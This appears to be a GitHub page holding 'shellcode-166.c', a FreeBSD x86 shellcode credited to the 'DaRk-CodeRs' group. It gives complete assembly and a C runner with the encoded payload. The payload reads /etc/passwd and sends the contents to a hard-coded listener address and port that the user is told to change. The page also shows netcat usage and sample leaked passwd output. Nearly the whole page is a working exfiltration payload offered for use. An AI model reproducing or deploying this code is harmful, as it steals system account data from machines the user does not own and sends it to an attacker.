-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathshellcode-166.c
executable file
·136 lines (115 loc) · 3.59 KB
/
shellcode-166.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
***(C)oDed bY suN8Hclf***
DaRk-CodeRs Group production, kid
[FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes]
This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263)
(really learnt a lot while coding this one ;])
Compile:
nasm -f elf shellcode.asm
ld -e _start -o shellcode shellcode.o
================================================================================
How it works:
1st terminal: $nc -l 8000
2nd terminal: $./shellcode
2nd terminal:
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
[..]
================================================================================
Code:
-------------------------code.asm---------------------
section .text
global _start
_start:
xor eax, eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f ;file to open (default:/etc/passwd)
mov ebx, esp
push eax
push ebx
mov al, 5 ;use: 'cat /usr/src/sys/kern/syscalls.master | grep *' to get the right numbers
push eax
int 0x80 ;open()
mov ebx, eax ;file descriptor to ebx
xor eax, eax ;we should clean eax each time we return from int 0x80
xor ecx, ecx
mov cx, 3333 ;3333 bytes is probably enough
push ecx
mov esi, esp ;put our data on the stack
push esi
push ebx
mov al, 3
push eax
int 0x80 ;read()
mov ebp, eax
xor eax, eax
mov al, 6
push ebx
push eax
int 0x80 ;close()
xor eax, eax
push eax
push byte 0x01
push byte 0x02
mov al, 97
push eax
int 0x80 ;socket()
mov edx, eax ;socket descriptor to edx
push 0x2101a8c0 ;192.168.1.33, change IT!!!
push 0x401f02AA ;port 8000
mov eax, esp
push byte 0x10
push eax
push edx
xor eax, eax
mov al, 98
push eax
int 0x80 ;connect()
xor eax, eax
push ebp
push esi ;our buffer with data
push edx
mov al, 4
push eax
int 0x80 ;write()
xor eax, eax
inc eax
push eax
push eax
int 0x80 ;exit()
-------------------------code.asm---------------------
C Code:
-------------------------code.c-----------------------
#include <stdio.h>
char shellcode[]=
"\x31\xc0\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63"
"\x89\xe3\x50\x53\xb0\x05\x50\xcd\x80\x89\xc3\x31\xc0\x31\xc9\x66\xb9\x05"
"\x0d\x51\x89\xe6\x56\x53\xb0\x03\x50\xcd\x80\x89\xc5\x31\xc0\xb0\x06\x53"
"\x50\xcd\x80\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2"
"\x68\xc0\xa8\x01\x21" //<- host address
"\x68\xaa\x02\x1f\x40" // <- port number
"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc0\x55\x56\x52"
"\xb0\x04\x50\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80";
int main(int argc, char **argv) {
int (*func)();
func=(int (*)())shellcode;
(int)(*func)();
}
-------------------------code.c-----------------------
Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor
Visit us : www.dark-coders.pl